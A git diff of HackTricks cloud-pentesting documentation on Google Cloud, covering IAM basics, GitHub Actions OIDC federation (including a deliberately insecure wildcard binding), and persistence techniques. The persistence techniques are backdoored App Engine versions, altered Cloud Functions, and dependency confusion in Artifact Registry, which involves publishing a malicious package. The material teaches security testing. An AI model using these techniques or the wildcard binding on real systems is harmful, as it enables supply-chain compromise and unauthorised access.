+ - Here you can see the assets supported by this API: [https://cloud.google.com/asset-inventory/docs/supported-asset-types](https://cloud.google.com/asset-inventory/docs/supported-asset-types) +- Check **tools** that can be [**used in several clouds here**](../pentesting-cloud-methodology.md). +- [**gcp_scanner**](https://github.com/google/gcp_scanner): This is a GCP resource scanner that can help determine what **level of access certain credentials posses** on GCP. ```bash # Install @@ -193,9 +178,9 @@ pip install -r requirements.txt python3 __main__.py -o /tmp/output/ -g "$HOME/.config/gcloud" ``` -* [**gcp\_enum**](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_enum): Bash script to enumerate a GCP environment using gcloud cli and saving the results in a file. -* [**GCP-IAM-Privilege-Escalation**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldn’t make run the enumerate script). -* [**BF My GCP Permissions**](https://github.com/carlospolop/bf_my_gcp_permissions): Script to bruteforce your permissions. +- [**gcp_enum**](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_enum): Bash script to enumerate a GCP environment using gcloud cli and saving the results in a file. +- [**GCP-IAM-Privilege-Escalation**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldn’t make run the enumerate script). +- [**BF My GCP Permissions**](https://github.com/carlospolop/bf_my_gcp_permissions): Script to bruteforce your permissions. ## gcloud config & debug 
@@ -255,19 +240,6 @@ gcloud config unset auth/access_token_file ## References -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) +- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-basic-information/README.md b/src/pentesting-cloud/gcp-security/gcp-basic-information/README.md similarity index 73% rename from pentesting-cloud/gcp-security/gcp-basic-information/README.md rename to src/pentesting-cloud/gcp-security/gcp-basic-information/README.md index 4adbc2a48..890c5d03b 100644 --- a/pentesting-cloud/gcp-security/gcp-basic-information/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-basic-information/README.md @@ -1,19 +1,6 @@ # GCP - Basic Information -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## **Resource hierarchy** @@ -30,7 +17,7 @@ Organization A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc. -

https://cloud.google.com/static/resource-manager/img/cloud-hierarchy.svg

+

https://cloud.google.com/static/resource-manager/img/cloud-hierarchy.svg

## **Projects Migration** @@ -40,24 +27,24 @@ It's possible to **migrate a project without any organization** to an organizati Allow to centralize control over your organization's cloud resources: -* Centralize control to **configure restrictions** on how your organization’s resources can be used. -* Define and establish **guardrails** for your development teams to stay within compliance boundaries. -* Help project owners and their teams move quickly without worry of breaking compliance. +- Centralize control to **configure restrictions** on how your organization’s resources can be used. +- Define and establish **guardrails** for your development teams to stay within compliance boundaries. +- Help project owners and their teams move quickly without worry of breaking compliance. These policies can be created to **affect the complete organization, folder(s) or project(s)**. Descendants of the targeted resource hierarchy node **inherit the organization policy**. In order to **define** an organization policy, **you choose a** [**constraint**](https://cloud.google.com/resource-manager/docs/organization-policy/overview#constraints), which is a particular type of restriction against either a Google Cloud service or a group of Google Cloud services. You **configure that constraint with your desired restrictions**. -

https://cloud.google.com/resource-manager/img/org-policy-concepts.svg

+

https://cloud.google.com/resource-manager/img/org-policy-concepts.svg

#### Common use cases -* Limit resource sharing based on domain. -* Limit the usage of Identity and Access Management service accounts. -* Restrict the physical location of newly created resources. -* Disable service account creation +- Limit resource sharing based on domain. +- Limit the usage of Identity and Access Management service accounts. +- Restrict the physical location of newly created resources. +- Disable service account creation -
+
There are many more constraints that give you fine-grained control of your organization's resources. For **more information, see the** [**list of all Organization Policy Service constraints**](https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints)**.** 
@@ -69,39 +56,39 @@ There are many more constraints that give you fine-grained control of your organ **Access Management Policies** -* **Domain restricted contacts:** Prevents adding users to Essential Contacts outside your specified domains. This limits Essential Contacts to only allow managed user identities in your selected domains to receive platform notifications. -* **Domain restricted sharing:** Prevents adding users to IAM policies outside your specified domains. This limits IAM policies to only allow managed user identities in your selected domains to access resources inside this organization. -* **Public access prevention:** Prevents Cloud Storage buckets from being exposed to the public. This ensures that a developer can't configure Cloud Storage buckets to have unauthenticated internet access. -* **Uniform bucket level access:** Prevents object-level access control lists (ACLs) in Cloud Storage buckets. This simplifies your access management by applying IAM policies consistently across all objects in Cloud Storage buckets. -* **Require OS login:** VMs created in new projects will have OS Login enabled. This lets you manage SSH access to your instances using IAM without needing to create and manage individual SSH keys. +- **Domain restricted contacts:** Prevents adding users to Essential Contacts outside your specified domains. This limits Essential Contacts to only allow managed user identities in your selected domains to receive platform notifications. +- **Domain restricted sharing:** Prevents adding users to IAM policies outside your specified domains. This limits IAM policies to only allow managed user identities in your selected domains to access resources inside this organization. +- **Public access prevention:** Prevents Cloud Storage buckets from being exposed to the public. This ensures that a developer can't configure Cloud Storage buckets to have unauthenticated internet access. 
+- **Uniform bucket level access:** Prevents object-level access control lists (ACLs) in Cloud Storage buckets. This simplifies your access management by applying IAM policies consistently across all objects in Cloud Storage buckets. +- **Require OS login:** VMs created in new projects will have OS Login enabled. This lets you manage SSH access to your instances using IAM without needing to create and manage individual SSH keys. **Additional security policies for service accounts** -* **Disable automatic IAM grants**: Prevents the default App Engine and Compute Engine service accounts from automatically being granted the Editor IAM role on a project at creation. This ensures service accounts don't receive overly-permissive IAM roles upon creation. -* **Disable service account key creation**: Prevents the creation of public service account keys. This helps reduce the risk of exposing persistent credentials. -* **Disable service account key upload**: Prevents the uploading of public service account keys. This helps reduce the risk of leaked or reused key material. +- **Disable automatic IAM grants**: Prevents the default App Engine and Compute Engine service accounts from automatically being granted the Editor IAM role on a project at creation. This ensures service accounts don't receive overly-permissive IAM roles upon creation. +- **Disable service account key creation**: Prevents the creation of public service account keys. This helps reduce the risk of exposing persistent credentials. +- **Disable service account key upload**: Prevents the uploading of public service account keys. This helps reduce the risk of leaked or reused key material. **Secure VPC network configuration policies** -* **Define allowed external IPs for VM instances**: Prevents the creation of Compute instances with a public IP, which can expose them to internet traffic. 
+- **Define allowed external IPs for VM instances**: Prevents the creation of Compute instances with a public IP, which can expose them to internet traffic. -- **Disable VM nested virtualization**: Prevents the creation of nested VMs on Compute Engine VMs. This decreases the security risk of having unmonitored nested VMs. +* **Disable VM nested virtualization**: Prevents the creation of nested VMs on Compute Engine VMs. This decreases the security risk of having unmonitored nested VMs. -* **Disable VM serial port:** Prevents serial port access to Compute Engine VMs. This prevents input to a server’s serial port using the Compute Engine API. +- **Disable VM serial port:** Prevents serial port access to Compute Engine VMs. This prevents input to a server’s serial port using the Compute Engine API. -- **Restrict authorized networks on Cloud SQL instances:** Prevents public or non-internal network ranges from accessing your Cloud SQL databases. +* **Restrict authorized networks on Cloud SQL instances:** Prevents public or non-internal network ranges from accessing your Cloud SQL databases. -* **Restrict Protocol Forwarding Based on type of IP Address:** Prevents VM protocol forwarding for external IP addresses. +- **Restrict Protocol Forwarding Based on type of IP Address:** Prevents VM protocol forwarding for external IP addresses. -- **Restrict Public IP access on Cloud SQL instances:** Prevents the creation of Cloud SQL instances with a public IP, which can expose them to internet traffic. +* **Restrict Public IP access on Cloud SQL instances:** Prevents the creation of Cloud SQL instances with a public IP, which can expose them to internet traffic. -* **Restrict shared VPC project lien removal:** Prevents the accidental deletion of Shared VPC host projects. +- **Restrict shared VPC project lien removal:** Prevents the accidental deletion of Shared VPC host projects. 
-- **Sets the internal DNS setting for new projects to Zonal DNS Only:** Prevents the use of a legacy DNS setting that has reduced service availability. +* **Sets the internal DNS setting for new projects to Zonal DNS Only:** Prevents the use of a legacy DNS setting that has reduced service availability. -* **Skip default network creation:** Prevents automatic creation of the default VPC network and related resources. This avoids overly-permissive default firewall rules. +- **Skip default network creation:** Prevents automatic creation of the default VPC network and related resources. This avoids overly-permissive default firewall rules. -- **Disable VPC External IPv6 usage:** Prevents the creation of external IPv6 subnets, which can be exposed to unauthorized internet access. +* **Disable VPC External IPv6 usage:** Prevents the creation of external IPv6 subnets, which can be exposed to unauthorized internet access. 
@@ -114,9 +101,9 @@ This could be a problem because this means that the only way to find out **which There are **three types** of roles in IAM: -* **Basic/Primitive roles**, which include the **Owner**, **Editor**, and **Viewer** roles that existed prior to the introduction of IAM. -* **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have** [**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined_roles). -* **Custom roles**, which provide granular access according to a user-specified list of permissions. +- **Basic/Primitive roles**, which include the **Owner**, **Editor**, and **Viewer** roles that existed prior to the introduction of IAM. +- **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have** [**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined_roles). +- **Custom roles**, which provide granular access according to a user-specified list of permissions. There are thousands of permissions in GCP. In order to check if a role has a permissions you can [**search the permission here**](https://cloud.google.com/iam/docs/permissions-reference) and see which roles have it. @@ -125,9 +112,9 @@ Moreover, note that **permissions** will only **take effect** if they are **atta Or check if a **custom role can use a** [**specific permission in here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.** -{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} -[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-iam-and-org-policies-enum.md +{{#endref}} ## Users 
@@ -145,15 +132,15 @@ When an organisation is created several groups are **strongly suggested to be cr ## **Default Password Policy** -* Enforce strong passwords -* Between 8 and 100 characters -* No reuse -* No expiration -* If people is accessing Workspace through a third party provider, these requirements aren't applied. +- Enforce strong passwords +- Between 8 and 100 characters +- No reuse +- No expiration +- If people is accessing Workspace through a third party provider, these requirements aren't applied. -
+
-
+
## **Service accounts** @@ -179,9 +166,9 @@ SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com There are 2 main ways to access GCP as a service account: -* **Via OAuth tokens**: These are tokens that you will get from places like metadata endpoints or stealing http requests and they are limited by the **access scopes**. -* **Keys**: These are public and private key pairs that will allow you to sign requests as the service account and even generate OAuth tokens to perform actions as the service account. These keys are dangerous because they are more complicated to limit and control, that's why GCP recommend to not generate them. - * Note that every-time a SA is created, **GCP generates a key for the service account** that the user cannot access (and won't be listed in the web application). According to [**this thread**](https://www.reddit.com/r/googlecloud/comments/f0ospy/service_account_keys_observations/) this key is **used internally by GCP** to give metadata endpoints access to generate the accesible OAuth tokens. +- **Via OAuth tokens**: These are tokens that you will get from places like metadata endpoints or stealing http requests and they are limited by the **access scopes**. +- **Keys**: These are public and private key pairs that will allow you to sign requests as the service account and even generate OAuth tokens to perform actions as the service account. These keys are dangerous because they are more complicated to limit and control, that's why GCP recommend to not generate them. + - Note that every-time a SA is created, **GCP generates a key for the service account** that the user cannot access (and won't be listed in the web application). According to [**this thread**](https://www.reddit.com/r/googlecloud/comments/f0ospy/service_account_keys_observations/) this key is **used internally by GCP** to give metadata endpoints access to generate the accesible OAuth tokens. ### **Access scopes** 
@@ -192,7 +179,6 @@ Google actually [recommends](https://cloud.google.com/compute/docs/access/servic You can see what **scopes** are **assigned** by **querying:** -{% code overflow="wrap" %} ```bash curl 'https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=' @@ -207,7 +193,6 @@ curl 'https://www.googleapis.com/oauth2/v1/tokeninfo?access_token= "access_type": "offline" } ``` -{% endcode %} The previous **scopes** are the ones generated by **default** using **`gcloud`** to access data. This is because when you use **`gcloud`** you first create an OAuth token, and then use it to contact the endpoints. 
@@ -217,44 +202,29 @@ You can **find a list of** [**all the possible scopes in here**](https://develop If you have **`gcloud`** browser credentials, it's possible to **obtain a token with other scopes,** doing something like: -{% code overflow="wrap" %} ```bash # Maybe you can get a user token with other scopes changing the scopes array from ~/.config/gcloud/credentials.db # Set new scopes for SDKs credentials gcloud auth application-default login --scopes=https://www.googleapis.com/auth/userinfo.email,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/sqlservice.login,https://www.googleapis.com/auth/appengine.admin,https://www.googleapis.com/auth/compute,https://www.googleapis.com/auth/accounts.reauth,https://www.googleapis.com/auth/admin.directory.user,https://www.googleapis.com/auth/admin.directory.group,https://www.googleapis.com/auth/admin.directory.domain,https://www.googleapis.com/auth/admin.directory.user -# Print new token +# Print new token gcloud auth application-default print-access-token # To use this token with some API you might need to use curl to indicate the project header with --header "X-Goog-User-Project: " ``` -{% endcode %} ## **Terraform IAM Policies, Bindings and Memberships** -As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam) using terraform with GCP there are different ways to grant a principal access over a resource: +As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam) using terraform with GCP there are different ways to grant a principal access over a resource: -* **Memberships**: You set **principals as members of roles** **without restrictions** over the role or 
the principals. You can put a user as a member of a role and then put a group as a member of the same role and also set those principals (user and group) as member of other roles. -* **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isn’t binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**. -* **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role). +- **Memberships**: You set **principals as members of roles** **without restrictions** over the role or the principals. You can put a user as a member of a role and then put a group as a member of the same role and also set those principals (user and group) as member of other roles. +- **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isn’t binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**. +- **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). 
Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role). ## References -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) -* [https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) +- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) +- [https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md b/src/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
new file mode 100644
index 000000000..55e8d2f71
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
@@ -0,0 +1,153 @@
+# GCP - Federation Abuse
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## OIDC - Github Actions Abuse
+
+### GCP
+
+In order to give **access to the Github Actions** from a Github repo to a GCP **service account** the following steps are needed:
+
+- **Create the Service Account** to access from github actions with the **desired permissions:**
+
+```bash
+projectId=FIXME
+gcloud config set project $projectId
+
+# Create the Service Account
+gcloud iam service-accounts create "github-demo-sa"
+saId="github-demo-sa@${projectId}.iam.gserviceaccount.com"
+
+# Enable the IAM Credentials API
+gcloud services enable iamcredentials.googleapis.com
+
+# Give permissions to SA
+
+gcloud projects add-iam-policy-binding $projectId \
+ --member="serviceAccount:$saId" \
+ --role="roles/iam.securityReviewer"
+```
+
+- Generate a **new workload identity pool**:
+
+```bash
+# Create a Workload Identity Pool
+poolName=wi-pool
+
+gcloud iam workload-identity-pools create $poolName \
+ --location global \
+ --display-name $poolName
+
+poolId=$(gcloud iam workload-identity-pools describe $poolName \
+ --location global \
+ --format='get(name)')
+```
+
+- Generate a new **workload identity pool OIDC provider** that **trusts** github actions (by org/repo name in this scenario):
+
+```bash
+attributeMappingScope=repository # could be sub (GitHub repository and branch) or repository_owner (GitHub organization)
+
+gcloud iam workload-identity-pools providers create-oidc $poolName \
+ --location global \
+ --workload-identity-pool $poolName \
+ --display-name $poolName \
+ --attribute-mapping "google.subject=assertion.${attributeMappingScope},attribute.actor=assertion.actor,attribute.aud=assertion.aud,attribute.repository=assertion.repository" \
+ --issuer-uri "https://token.actions.githubusercontent.com"
+
+providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
+ --location global \
+ --workload-identity-pool $poolName \
+ --format='get(name)')
+```
+
+- Finally, **allow the principal** from the provider to use a service principal:
+
+```bash
+gitHubRepoName="repo-org/repo-name"
+gcloud iam service-accounts add-iam-policy-binding $saId \
+ --role "roles/iam.workloadIdentityUser" \
+ --member "principalSet://iam.googleapis.com/${poolId}/attribute.${attributeMappingScope}/${gitHubRepoName}"
+```
+
+> [!WARNING]
+> Note how in the previous member we are specifying the **`org-name/repo-name`** as conditions to be able to access the service account (other params that makes it **more restrictive** like the branch could also be used).
+>
+> However it's also possible to **allow all github to access** the service account creating a provider such the following using a wildcard:
+
# Create a Workload Identity Pool
+poolName=wi-pool2
+
+gcloud iam workload-identity-pools create $poolName \
+  --location global \
+  --display-name $poolName
+
+poolId=$(gcloud iam workload-identity-pools describe $poolName \
+  --location global \
+  --format='get(name)')
+
+gcloud iam workload-identity-pools providers create-oidc $poolName \
+  --project="${projectId}" \
+  --location="global" \
+  --workload-identity-pool="$poolName" \
+  --display-name="Demo provider" \
+  --attribute-mapping="google.subject=assertion.sub,attribute.actor=assertion.actor,attribute.aud=assertion.aud" \
+  --issuer-uri="https://token.actions.githubusercontent.com"
+
+providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
+  --location global \
+  --workload-identity-pool $poolName \
+  --format='get(name)')
+
+# CHECK THE WILDCARD
+gcloud iam service-accounts add-iam-policy-binding "${saId}" \
+  --project="${projectId}" \
+  --role="roles/iam.workloadIdentityUser" \
+  --member="principalSet://iam.googleapis.com/${poolId}/*"
+
+ +> [!WARNING] +> In this case anyone could access the service account from github actions, so it's important always to **check how the member is defined**.\ +> It should be always something like this: +> +> `attribute.{custom_attribute}`:`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` + +### Github + +Remember to change **`${providerId}`** and **`${saId}`** for their respective values: + +```yaml +name: Check GCP action +on: + workflow_dispatch: + pull_request: + branches: + - main + +permissions: + id-token: write + +jobs: + Get_OIDC_ID_token: + runs-on: ubuntu-latest + steps: + - id: "auth" + name: "Authenticate to GCP" + uses: "google-github-actions/auth@v2.1.3" + with: + create_credentials_file: "true" + workload_identity_provider: "${providerId}" # In the providerId, the numerical project ID (12 digit number) should be used + service_account: "${saId}" # instead of the alphanumeric project ID. ex: + activate_credentials_file: true # projects/123123123123/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider' + - id: "gcloud" + name: "gcloud" + run: |- + gcloud config set project + gcloud config set account '${saId}' + gcloud auth login --brief --cred-file="${{ steps.auth.outputs.credentials_file_path }}" + gcloud auth list + gcloud projects list + gcloud secrets list +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md b/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md similarity index 100% rename from pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md rename to src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md 
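Review bot: The inline comment on `attributeMappingScope` says it could also be `sub` or `repository_owner`, but the `--attribute-mapping` in the same block only declares `attribute.actor`, `attribute.aud` and `attribute.repository`, so the later `--member "principalSet://iam.googleapis.com/${poolId}/attribute.${attributeMappingScope}/${gitHubRepoName}"` binding only resolves for `repository`. For the other two values the mapping would also need `attribute.sub=assertion.sub` or `attribute.repository_owner=assertion.repository_owner` (or, for the subject case, a `principal://…/subject/…` member); as written, switching the variable produces a binding that matches no token, which is easy to misread as a working restriction when auditing who can assume the service account. A comment after the `create-oidc` command would prevent that, e.g. `# Any attribute referenced in the add-iam-policy-binding --member below must also be declared in --attribute-mapping`. The page also appears to have lost the code-fence lines around the wildcard example (the first line of that block carries no `+` marker), which is an extraction artifact rather than a content issue.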
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/README.md b/src/pentesting-cloud/gcp-security/gcp-persistence/README.md
similarity index 100%
rename from pentesting-cloud/gcp-security/gcp-persistence/README.md
rename to src/pentesting-cloud/gcp-security/gcp-persistence/README.md
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md
new file mode 100644
index 000000000..76643a4ae
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md
@@ -0,0 +1,21 @@
+# GCP - API Keys Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## API Keys
+
+For more information about API Keys check:
+
+{{#ref}}
+../gcp-services/gcp-api-keys-enum.md
+{{#endref}}
+
+### Create new / Access existing ones
+
+Check how to do this in:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-apikeys-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md
new file mode 100644
index 000000000..82bf6fd5e
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md
@@ -0,0 +1,21 @@
+# GCP - App Engine Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## App Engine
+
+For more information about App Engine check:
+
+{{#ref}}
+../gcp-services/gcp-app-engine-enum.md
+{{#endref}}
+
+### Modify code
+
+If yoi could just modify the code of a running version or create a new one yo could make it run your backdoor and mantain persistence.
+
+### Old version persistence
+
+**Every version of the web application is going to be run**, if you find that an App Engine project is running several versions, you could **create a new one** with your **backdoor** code, and then **create a new legit** one so the last one is the legit but there will be a **backdoored one also running**.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
new file mode 100644
index 000000000..e4c4bb258
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
@@ -0,0 +1,42 @@
+# GCP - Artifact Registry Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Artifact Registry
+
+For more information about Artifact Registry check:
+
+{{#ref}}
+../gcp-services/gcp-artifact-registry-enum.md
+{{#endref}}
+
+### Dependency Confusion
+
+- What happens if a **remote and a standard** repositories **are mixed in a virtual** one and a package exists in both?
+ - The one with the **highest priority set in the virtual repository** is used
+ - If the **priority is the same**:
+ - If the **version** is the **same**, the **policy name alphabetically** first in the virtual repository is used
+ - If not, the **highest version** is used
+
+> [!CAUTION]
+> Therefore, it's possible to **abuse a highest version (dependency confusion)** in a public package registry if the remote repository has a higher or same priority
+
+This technique can be useful for **persistence** and **unauthenticated access** as to abuse it it just require to **know a library name** stored in Artifact Registry and **create that same library in the public repository (PyPi for python for example)** with a higher version.
+
+For persistence these are the steps you need to follow:
+
+- **Requirements**: A **virtual repository** must **exist** and be used, an **internal package** with a **name** that doesn't exist in the **public repository** must be used.
+- Create a remote repository if it doesn't exist
+- Add the remote repository to the virtual repository
+- Edit the policies of the virtual registry to give a higher priority (or same) to the remote repository.\
+ Run something like:
+ - [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file)
+- Download the legit package, add your malicious code and register it in the public repository with the same version. Every time a developer installs it, he will install yours!
+
+For more information about dependency confusion check:
+
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/dependency-confusion
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md
new file mode 100644
index 000000000..e524fd97e
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md
@@ -0,0 +1,21 @@
+# GCP - BigQuery Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## BigQuery
+
+For more information about BigQuery check:
+
+{{#ref}}
+../gcp-services/gcp-bigquery-enum.md
+{{#endref}}
+
+### Grant further access
+
+Grant further access over datasets, tables, rows and columns to compromised users or external users. Check the privileges needed and how to do this in the page:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-bigquery-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md
new file mode 100644
index 000000000..e02c5e3e4
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md
@@ -0,0 +1,19 @@
+# GCP - Cloud Functions Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Functions
+
+For more info about Cloud Functions check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-functions-enum.md
+{{#endref}}
+
+### Persistence Techniques
+
+- **Modify the code** of the Cloud Function, even just the `requirements.txt`
+- **Allow anyone** to call a vulnerable Cloud Function or a backdoor one
+- **Trigger** a Cloud Function when something happens to infect something
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md
new file mode 100644
index 000000000..a59ef33ba
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md
@@ -0,0 +1,25 @@
+# GCP - Cloud Run Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Run
+
+For more information about Cloud Run check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-run-enum.md
+{{#endref}}
+
+### Backdoored Revision
+
